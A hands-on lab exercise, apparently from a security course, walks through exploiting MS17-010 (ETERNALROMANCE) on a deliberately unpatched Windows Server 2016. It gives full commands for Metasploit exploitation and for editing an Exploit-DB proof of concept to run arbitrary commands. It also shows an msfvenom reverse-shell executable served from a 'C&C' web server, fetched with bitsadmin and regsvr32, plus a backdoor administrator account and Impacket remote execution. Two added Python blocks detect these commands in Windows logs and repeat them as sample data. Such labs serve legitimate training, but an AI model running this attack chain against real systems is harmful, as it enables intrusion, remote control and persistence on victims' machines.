A13: ETERNALROMANCE v. Windows Server 2016 (20 pts)

What You Need for this Project

Purpose

To practice the ETERNALROMANCE attack. This awesome attack gives you SYSTEM access on almost any unpatched Windows machine without the need for social engineering.

Task 1: Using Metasploit

Preparing your Windows Target

I recommend making a Google Cloud server with 4 vCPUs running Windows Server 2016 Datacenter with Desktop Experience for this project.

Start the Windows target.

Make your machine discoverable on the network.

Follow these steps to share a folder.

Enabling the Guest Account

At the bottom of the desktop, right-click the blue PowerShell icon and click "Run as Administrator".

In the "User Account Control" box, click Yes.

Execute this command to enable the Guest account:

net user guest /active:yes
The command succeeds, as shown below.

Finding the Target IP Address

On the Windows target, in the PowerShell window, execute the IPCONFIG command.

Note the target's IP address.

Testing the Target

On your Linux attacker, in an SSH window, execute these commands, one at a time.

Replace the IP address with the IP address of your Windows target.

msfconsole -q
search ms17_010
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 10.168.0.3
exploit
If you are using a Google Cloud server, your server will say "Host does NOT appear vulnerable", as shown below.

Google Cloud machines are updated and no longer vulnerable to this old attack. To make them vulnerable, we must remove updates.

Disabling Automatic Updates

On your Windows target, click Start. Right-click "Windows PowerShell" and click "Run as Administrator". In the User Account Control box, click Yes.

In the PowerShell window, execute this command:

sconfig
If the updates aren't already set to manual, enter options 5 and m to set updates to Manual, as shown below.

Removing Updates

On your Windows target, open Control Panel. Under "Programs", click "Uninstall a Program". On the left side, click "View installed updates". You see several recent updates, as shown below.

Remove some updates, starting at the top. Then restart your Windows server and scan it again with Metasploit. Repeat the process until your server is vulnerable.

When I did it, this process worked:

I ended up with these remaining updates.

Testing the Target

On your Linux attacker, in an SSH window, execute these commands, one at a time.

Replace the IP address with the IP address of your Windows target.

msfconsole -q
search ms17_010
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 10.168.0.3
exploit
The target should be vulnerable, as shown below.

Exploiting the Target

On your Linux attacker, in the Terminal window, at the msf5 prompt, execute these commands, one at a time.

Replace the IP address with the IP address of your Windows target.

use exploit/windows/smb/ms17_010_psexec
show info
set RHOSTS 10.168.0.3
exploit
You get a meterpreter session, as shown below.

A13.1: Recording Your Success (10 pts)

The flag is covered by a green box in the image above.

Task 2: Exploiting the Target Without Metasploit

Most new attacks aren't added to Metasploit for several weeks or months, so you need to be able to work from original Proof of Concept code.

Also, the OSCP certification requires you to exploit targets without using Metasploit.

Exploiting the Target with ETERNALROMANCE

On your Linux attacker, in an SSH window, execute these commands to download the exploit (into a file named 42315), download the mysmb.py library it needs, install Impacket, and run it:

wget https://www.exploit-db.com/download/42315
wget https://github.com/worawit/MS17-010/raw/master/mysmb.py
sudo apt update
sudo apt install python-pip git -y
git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket
pip install .
cd ..
python 42315
It runs, as shown below, asking for <ip> and [pipe_name].

We need to put the username into the exploit file.

On Linux, in an SSH window, execute this command:

nano 42315
Scroll down a page to find the USERNAME line. Insert the username Guest as shown below.

Leave the password empty.

Press Ctrl+X, Y, Enter to save the file.

On Linux, in an SSH window, execute this command to exploit the target, replacing the IP address with the IP address of your Windows target:

python 42315 10.138.0.2 netlogon
The exploit runs as shown below, ending with the message "creating file c:\pwned.txt on the target".

To verify that it worked, on the Windows target, open File Explorer.

Navigate to drive C:. The pwned file should be visible, as shown below.

Executing Arbitrary Commands

The exploit above was a simple proof-of-concept. Now we'll modify the exploit to run an arbitrary command.

It's a good practice to keep any script that works, and copy it to a new script when making changes, so we'll do that.

On Linux, in an SSH window, execute these commands to copy the exploit to a file named romance.py, and edit it with nano.

cp 42315 romance.py
nano romance.py
In nano, press Ctrl+W to search. Enter a search string of pwned as shown below.

Press Enter.

Nano finds the string. Notice the red line beginning with "#service_exec", highlighted in the image below.

Remove the # character at the start of that line, as shown below. This uncomments it, so the command line inside it will execute. This command line creates a file named "pwned_exec".

Save the file with Ctrl+X, Y, Enter.

Exploiting the Target Again

On Linux, in an SSH window, execute this command to exploit the target, replacing the IP address with the IP address of your Windows target:
python romance.py 10.138.0.2 netlogon
The exploit runs as shown below, ending with a TIMEOUT error.

However, the exploit worked. To verify that, on the Windows target, look at the File Explorer window.

The pwned_exec file should be visible, as shown below.


Task 3: Creating Shellcode

Creating Malware with Msfvenom

In Linux, execute these commands to create a malicious Windows executable file named "shell-service.exe" and serve it from a malicious Web server. It's an executable designed to run as a service.

Adjust the IP address to match the IP address of your Linux machine (the C&C server).

sudo apt install apache2 -y
sudo msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.142.0.3 -f exe-service -o /var/www/html/shell-service.exe
sudo service apache2 start

Testing the Malware

On your Windows target, right-click Start. Click "Command Prompt (Admin)". In the User Account Control box, click Yes.

In the Administrator Command Prompt window, execute these commands, replacing the IP address with the IP address of your Linux machine:

cd \
bitsadmin /transfer wcb /priority high http://10.142.0.3/shell-service.exe C:\shell-service.exe
dir
The "shell-service.exe" file downloads, as shown below.

In the Administrator Command Prompt window, execute this command to run the malware:

shell-service.exe
The program cannot be executed, as shown below.

To see why, open Windows Defender and view the History. Windows Defender recognized the msfvenom-produced file as malicious and deleted it, as shown below.

Creating Powershell Shellcode with Ps1encode

Ps1encode creates PowerShell-based Metasploit payloads.

In Linux, execute these commands:

Adjust the IP address to match the IP address of your Linux machine (the C&C server).

sudo apt install ruby -y
git clone https://github.com/CroweCybersecurity/ps1encode
cd ps1encode
ruby ps1encode.rb -i 10.142.0.3 -p 2222 -t sct
It asks for the URL where the payload will be hosted. Enter this URL, replacing the IP address with the IP address of your Linux machine:
http://10.142.0.3/
The payload is generated, creating an "index.sct" file. Copy the command to be executed on the target system, highlighted in the image below.

In Linux, execute this command:

sudo cp index.sct /var/www/html

Testing the Shellcode

On your Windows target, in an Administrator Command Prompt window, execute the command beginning with "regsvr32" that ps1encode generated, as shown below.
regsvr32 /s /n /u /i:http://10.142.0.3//index.sct scrobj.dll
The exploit fails. Windows Defender caught this one too, as shown below.


Task 4: Living Off the Land

The modern method is to avoid using known hacking tools, and just use built-in Windows commands.

Using ETERNALROMANCE to Create the "Waldo2" User

On Linux, in an SSH window, execute these commands to copy the exploit to a file named romance1.py, and edit it with nano.
cp romance.py romance1.py
nano romance1.py
In nano, press Ctrl+W to search. Enter a search string of pwned.

Nano finds the string. In the line beginning with "service_exec", replace the command between the single quotes with this command, as shown below.

cmd /c net user waldo2 P@ssw0rd /add

Save the file with Ctrl+X, Y, Enter. Run the exploit with this command, replacing the IP address with the IP address of your Windows target:

python romance1.py 10.138.0.2 netlogon

Using ETERNALROMANCE to Make the "Waldo2" User a Local Administrator

On Linux, execute these commands:
cp romance.py romance2.py
nano romance2.py
In nano, press Ctrl+W to search. Enter a search string of pwned.

Nano finds the string. In the line beginning with "service_exec", replace the command between the single quotes with this command, as shown below.

cmd /c net localgroup administrators waldo2 /add

Save the file with Ctrl+X, Y, Enter. Run the exploit with this command, replacing the IP address with the IP address of your Windows target:

python romance2.py 10.138.0.2 netlogon
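Both the pwned_exec step in Task 2 and the two account changes above are delivered the same way: service_exec() has the Service Control Manager create, start and delete a throwaway service whose binary path is the cmd.exe one-liner, which leaves an Event ID 7045 ("A service was installed in the system") record in the target's System log. The rules below, an added example rather than code from the lab or from 42315, flag that pattern in constructed 7045 records; the field names are a simplification and the four-letter random service name comes from my reading of the exploit source, so treat both as assumptions.

```python
import re

# Constructed records shaped like Windows System log Event ID 7045
# ("A service was installed in the system"), reduced to two fields.
# Made-up samples, not captured logs.
SAMPLE_EVENTS = [
    {"service": "Spooler",  "image_path": r"C:\Windows\System32\spoolsv.exe"},
    {"service": "Sysmon64", "image_path": r"C:\Windows\Sysmon64.exe"},
    # What service_exec() leaves behind: a short random service name whose
    # "binary" is a cmd.exe one-liner (assumption: four random letters).
    {"service": "xKqW", "image_path": r"cmd /c copy c:\pwned.txt c:\pwned_exec.txt"},
    {"service": "mZtL", "image_path": r"cmd /c net user waldo2 P@ssw0rd /add"},
    {"service": "PqRs", "image_path": r"cmd /c net localgroup administrators waldo2 /add"},
]

# A real service binary is a PE that speaks the service control protocol; a
# shell interpreter at the start of the path is a command, not a service
# (the likely source of the TIMEOUT error the lab mentions on service start).
SHELL_AS_SERVICE = re.compile(
    r"^\s*\"?(?:[a-z]:\\\S*\\)?(?:cmd|powershell|pwsh)(?:\.exe)?\"?\s", re.I)
# Local account creation or admin-group membership change, as in Task 4.
ACCOUNT_CHANGE = re.compile(
    r"\bnet1?(?:\.exe)?\s+(?:user\s+\S+\s+.*?/add|localgroup\s+administrators\b.*?/add)", re.I)
# Assumption: service_exec() names the service with four random letters.
RANDOM_NAME = re.compile(r"^[A-Za-z]{4}$")

def classify_service_install(event):
    """Return the reasons (possibly none) this 7045 record looks like
    remote command execution through the Service Control Manager."""
    reasons = []
    if SHELL_AS_SERVICE.search(event["image_path"]):
        reasons.append("shell interpreter used as service binary")
    if ACCOUNT_CHANGE.search(event["image_path"]):
        reasons.append("account or admin-group change in service path")
    if RANDOM_NAME.match(event["service"]):
        reasons.append("four-letter random-looking service name")
    return reasons

def scan_service_installs(events):
    """Map each suspicious service name to its reasons; clean events are omitted."""
    findings = {}
    for event in events:
        reasons = classify_service_install(event)
        if reasons:
            findings[event["service"]] = reasons
    return findings

if __name__ == "__main__":
    print(scan_service_installs(SAMPLE_EVENTS))
```

On a real host the same three checks apply to the ImagePath and ServiceName fields of Event 7045, and the matching 7000/7009 start-failure events for the same service name corroborate the hit.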

Compiling the Impacket Tool Kit

Now that we have a listening SMB share and a local Administrator account, we can execute arbitrary commands using the "smbexec" tool.

On Linux, execute these commands:

sudo apt install git -y
sudo apt install python-setuptools -y
sudo apt install build-essential libssl-dev libffi-dev python-dev -y

git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket/
sudo python setup.py install
It gave me an ldap version error, as shown below, but I just ignored it and the tool I need worked anyway.

Now execute these commands, replacing the IP address with the IP address of your Windows target, to gather information from the target system. Notice that Windows Defender no longer stops you!

cd
./impacket/examples/atexec.py waldo2:P@ssw0rd@10.138.0.2 systeminfo
./impacket/examples/atexec.py waldo2:P@ssw0rd@10.138.0.2 net user
./impacket/examples/atexec.py waldo2:P@ssw0rd@10.138.0.2 "netstat -an"
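Defender blocked the msfvenom executable and the ps1encode scriptlet by their content, but the command lines that fetched and launched them (bitsadmin /transfer, regsvr32 /i:http... scrobj.dll) and the cmd.exe /C ... > %windir%\Temp\... 2>&1 line that Impacket's atexec runs through a scheduled task are visible in process-creation events (Security 4688 or Sysmon Event 1) even when nothing malicious survives on disk. The command-line rules below are an added example, not code from the lab or from Impacket; the records are constructed, and the atexec redirection shape is from my reading of atexec.py, so treat it as an assumption.

```python
import re

# Constructed process-creation records (think Security Event 4688 or
# Sysmon Event 1) reduced to the two fields the rules use. Made-up samples,
# not captured logs; the atexec line follows my reading of atexec.py.
SAMPLE_PROCESSES = [
    {"user": r"WIN-TARGET\Administrator",
     "cmdline": r"bitsadmin /transfer wcb /priority high http://10.142.0.3/shell-service.exe C:\shell-service.exe"},
    {"user": r"WIN-TARGET\Administrator",
     "cmdline": r"regsvr32 /s /n /u /i:http://10.142.0.3//index.sct scrobj.dll"},
    {"user": r"WIN-TARGET\waldo2",
     "cmdline": r"cmd.exe /C tasklist /svc > %windir%\Temp\KhQzXvPa 2>&1"},
    {"user": r"WIN-TARGET\alice",
     "cmdline": r"regsvr32 /s C:\Program Files\Vendor\widget.dll"},
    {"user": r"NT AUTHORITY\SYSTEM",
     "cmdline": r"C:\Windows\System32\svchost.exe -k netsvcs"},
]

# Each rule: (label, pattern). Ordinary use of these binaries is common, so
# the patterns key on the combination the lab used, not on the binary alone.
RULES = [
    ("bitsadmin /transfer fetching from a URL to disk",
     re.compile(r"\bbitsadmin(?:\.exe)?\b.*/transfer\b.*\bhttps?://", re.I)),
    ("regsvr32 loading a remote scriptlet through scrobj.dll",
     re.compile(r"\bregsvr32(?:\.exe)?\b.*/i:https?://.*\bscrobj\.dll", re.I)),
    (r"cmd /C with output redirected to Windows\Temp (atexec-style task)",
     re.compile(r"\bcmd(?:\.exe)?\s+/C\b.*>\s*(?:%windir%|\S*\\Windows)\\Temp\\\S+\s+2>&1", re.I)),
]

def match_rules(cmdline):
    """Return the labels of every rule the command line trips, in RULES order."""
    return [label for label, pattern in RULES if pattern.search(cmdline)]

def triage(records):
    """Return (user, labels) for each record that trips at least one rule."""
    hits = []
    for rec in records:
        labels = match_rules(rec["cmdline"])
        if labels:
            hits.append((rec["user"], labels))
    return hits

if __name__ == "__main__":
    for user, labels in triage(SAMPLE_PROCESSES):
        print(f"{user}: {'; '.join(labels)}")
```

Command-line logging has to be switched on for this to work: Security 4688 records the command line only when "Include command line in process creation events" is enabled, which is not the default.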

A13.2: WinDefend (10 pts)

On Linux, execute this command:
./impacket/examples/atexec.py waldo2:P@ssw0rd@10.138.0.2 "tasklist /svc"
The flag is the image name for the Windows Defender process, covered by a green box in the image below.

References

How to Exploit ETERNALROMANCE/SYNERGY to Get a Meterpreter Session on Windows Server 2016

Beginner's Guide to Impacket Tool kit (Part 1)


Posted 4-24-19